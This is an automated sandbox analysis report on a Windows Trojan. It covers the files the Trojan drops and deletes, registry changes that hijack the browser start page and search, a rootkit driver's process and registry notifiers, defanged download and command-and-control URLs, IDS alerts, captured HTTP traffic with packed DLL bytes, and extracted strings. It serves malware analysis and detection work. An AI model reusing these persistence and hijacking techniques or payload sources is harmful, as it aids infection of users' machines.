C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Windows\CLOG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Windows\xEQSlj.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

The process %original file name%.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\inplMsoI.dll (13 bytes)
C:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe (7930 bytes)

The Trojan deletes the following file(s):

C:\Windows\inplMsoI.dll (0 bytes)

Registry activity

The process 86ae56633941c20e9a65a719b5a2208.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"ErrorControl" = "1"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.baidu.com/s?word={searchTerms}&tn=90117059_hao_pg&ie=utf-8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"Start" = "3"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"Type" = "1"
"Devname" = "VIqWRnjsVneT"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90117059_hao_pg"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"ImagePath" = "\DosDevices\C:\Windows\system32\20ed6a\CDClient_EX.sys"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90117059_hao_pg"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "00 8D E7 CB 83 44 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "00 8D E7 CB 83 44 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
346a9183e3bceb14f02a229f1e9c5349 c:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe
346a9183e3bceb14f02a229f1e9c5349 c:\Users\All Users\prjNVt\86ae56633941c20e9a65a719b5a2208.exe
158b710a2ce07e3a34e46118f2ad39f2 c:\Windows\YbfHFk\DvMtvJIVG.dll
52ac959ebc7c2a2c8e29682b4ad39e15 c:\Windows\YbfHFk\iAFqcX.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\20ed6a\If56Km8kP8g.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\20ed6a\If56Km8kP8g.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\20ed6a\If56Km8kP8g.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1249280 1003520 5.54505 16917574c9651c104623cb79f6615541
.rsrc 1253376 12288 9728 4.43463 8f101314016c4a4799fd0caa4c86d69b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=8357 119.97.143.13
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://175.haodns123.cc/
hxxp://1212.ip138.com/ic.asp 113.200.90.149
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
hxxp://www.175sf.com/ 183.60.200.84
hxxp://www.go890.com/d2/x86.dll 87.245.198.83


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 03:48:29 GMT
Content-Length: 18658
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Tue, 01 Nov 2016 11:32:20 GMT
Accept-Ranges: bytes
ETag: "de335d9b3334d21:449e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 7082
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta name="mobile-agent"content=
"format=html5; url=hXXp://m.ip138.com/">..<title>IP........--
.................. | ............ | ............ | ...................
.....</title>..<meta name="Keywords" content="ip,IP....,IP...
.....,ip138">..<meta name="Description" content="ip,IP....,IP...
.....,ip138">..<script language="javascript">..<!--..if(wi
ndow.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/'
;..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip
.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");...
.document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("ht
tp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...
}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);
....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/
"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;
...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|
(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw
)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)
|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)
|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.
nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c
<<< skipped >>>


GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 05:46:20 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L...]..W...........!........
..............................................................@.......
..........................................................|...........
................................H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!...........c.........B..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.....8.9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 22 Nov 2016 05:46:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Tue, 22 Nov 2016 00:53:19 GMT
Content-Encoding: gzip
2fe8.............}.wZG........57.{..8 .$.{...3^.....{...f.. ..@.a=...Y
.~./.y>I..")... .BBH..@...h....#...d;...9....Qu......m^u.W...k....N
.......?...@g.0......x.#A[.H._...D.........?.G.!..>7....Uo2.."...K.
.Mg.../.......B..W...D..,..._.[ J.5VM.._..T......r..s..RI....Ui....U%.
_.k....N.}d2Z.Fk..#..6..~w...........Ne.h..{.%RB.&..s.z.A{&._y..J.{_..
2./...;..sKd.=..........z.g..I......r..G..i...~.......n.D;2d2k,.8.j(W\
......Y?..R....:.i....M..d... ......._.g.....Z&.......U.o.;...ODc.....
(.......U...Jpub..6.n.^ck...m..5.{.j...?3.=7...?...ri.../...=..Dj.Ed..
..B.U..J..,..{..p....E..Z.....?.=...bVSO..P. .TW.y..<.N.;.....(.c.Y
zb.......S"....&.Qi...'U../..w'zlF5t...........w..?...v......~.....U&g
t;VT.7.......~....4.jo.7.......P#.j..................6...G...P..M...A.
..hLj..%i...b....".jP{..w.......%..........*.U....l.Y{..m. .C~.h. ,Q..
.R.,V....e...j.H5......U.!. .....P.bY.B,&:.=)xO.....*...f6.~.z.BkT.4.?
..,5R.MF...!.Qc...L4y.@..ta ].S.U'Tk...F...c..'N...b.....f3...G.y....N
......R..U..Qn..I.?....2..h.....Y..S.T.{.....*c.y..M=&..4D=T?.[..~@...
.....U.......*P1...i.....[d3...M.}.Q....W.k.....Z.TQ...N.b.EC1. ...'..
.N..1t...L.f?..n...h....<6..N..X).c....L..c;X..H..3.....l...Z....9b
.R8W.d"\..4]..3.@..(....I....7..JT.Uu..|...\.z..kO...|u.X...4!|.2.{...
..j.....z...k......W.V...q0......g......kul..Q....6h.Cz.Uw...tO....)..
.m.K..`....zc...A.FS~_~...H.f.I...Pu]C..-........ .*...K/Y.u....MF....
....U..o..../.K..pl9.....Y...#Ky_..?...U ...........^.KV......$mh.*A..
...>..b....u.........$1.O....$y......C..1..o%...d*...r..*..fU..
<<< skipped >>>


GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 05:46:00 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 22 Nov 2016 03:29:18 GMT
Content-Type: application/octet-stream
Content-Length: 868352
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....@...v......@........P....@..........................@......q.....
..................................4...........m....................0..
......................................................................
..............CODE....................PEC2^O...... ....rsrc....0......
.".................. ....reloc.......0.......>..............@......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...................................................b.. .........c....X
.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7
i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.
*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.
......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}M.
I...Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R.
......O.....X}....@.A.....eF@......8..........K.Us....g.4L...)...x.J.0
.j.y....iQ.-W.s..j........r.......o......Wl2.b..f|.&..&L3/..3. R..
<<< skipped >>>


GET /index/getcfg?id=8357 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 
Server: nginx/1.4.4
Date: Tue, 22 Nov 2016 05:45:29 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
400a..............[......_J.~..2.........~<O.<...ja0`...0...~.H.
...j..V..c.. .$/.q......./...h..?.R...GR.~....%.].............*.{..W..
..o.mo...A._G..s..../....d.....r....k....%.N.....?N......Y.&.....6y...
.y.swLo.tUDe4u......&....._....'..&mZ...._.....uS.${..G.......\..ty..7
...Y...*.M...7=7..{3.|.f....mq....h.....E".I/.......M....47..;C:...Z.q
.9......A.....g.....l.. ..............................F............F..
.......o..Cn0..vv...|....Y5......A.:....^.`.zx...y.K..n..~....Y.....K.
n8...S.:..4...bP..>...<.......NeR.7A...Z......`....w...#..nE.2.)
.f.........`..;/f3..l..n...~_...F.sv.%.t..'...[......W....1..}._...0O.
./...x8.V...l.\3%.L...7.I.=fsB..[...8.p..h........p.._._......z.~.G$..
........q..........%..s.<.. ......|.K.._...Z.g...T......../k.......
....._...._.I....._6...~._../.._.X>:.._.v.?y.....f"z.....=.:%...}2{
...\.7..Q...=...0.oE.v..JP....j..V..>/......U..u.:....&......{SvJ..
.'..o.'gYv<....WyR..>..=..q......[...y.:|.......3.a...B......h.g
o..suz..pX]O..E.:i...D.....a._........."....7#..0.../.nB%.......]..*K.
Z..G......K.fX..(. ..4..\.4n,..}....}.S.<1LG...L...cy>..-....Gn.
.....rY.....o.D..K...9G..quN.&....R...Y....[:...g.J.1t..;{ge...@....'.
.\$7}.4...`.Q..zY..n...R.....m.....;.5..A.0...%..._...HS..gzt<.g...
...Nox...Nm*[.t..%-;&a~...;k.....L........3...S..D..$w./.\.o;H..N.#.`N
er....\.Y r.Ng.Ys........ Kz[Ztw.z......9_.y./#v.....>.......;Kg9..
.Yt..G0).WMyNe..]sNg|.o...@m...tz.&Jh.......I.......`...6a.~.I...96M&g
t;...u.W4.....b.p..6N..Y...r.......>.E}j..W...KrI...........g..
<<< skipped >>>


GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Tue, 22 Nov 2016 05:27:25 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQATCCDRD=PNFPNOOBJDOMLOLLBGFPFJNH; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.226] ............</center></body></htm
l>..

The Trojan connects to the servers at the folowing location(s):

86ae56633941c20e9a65a719b5a2208.exe_2388:

`.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortX
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
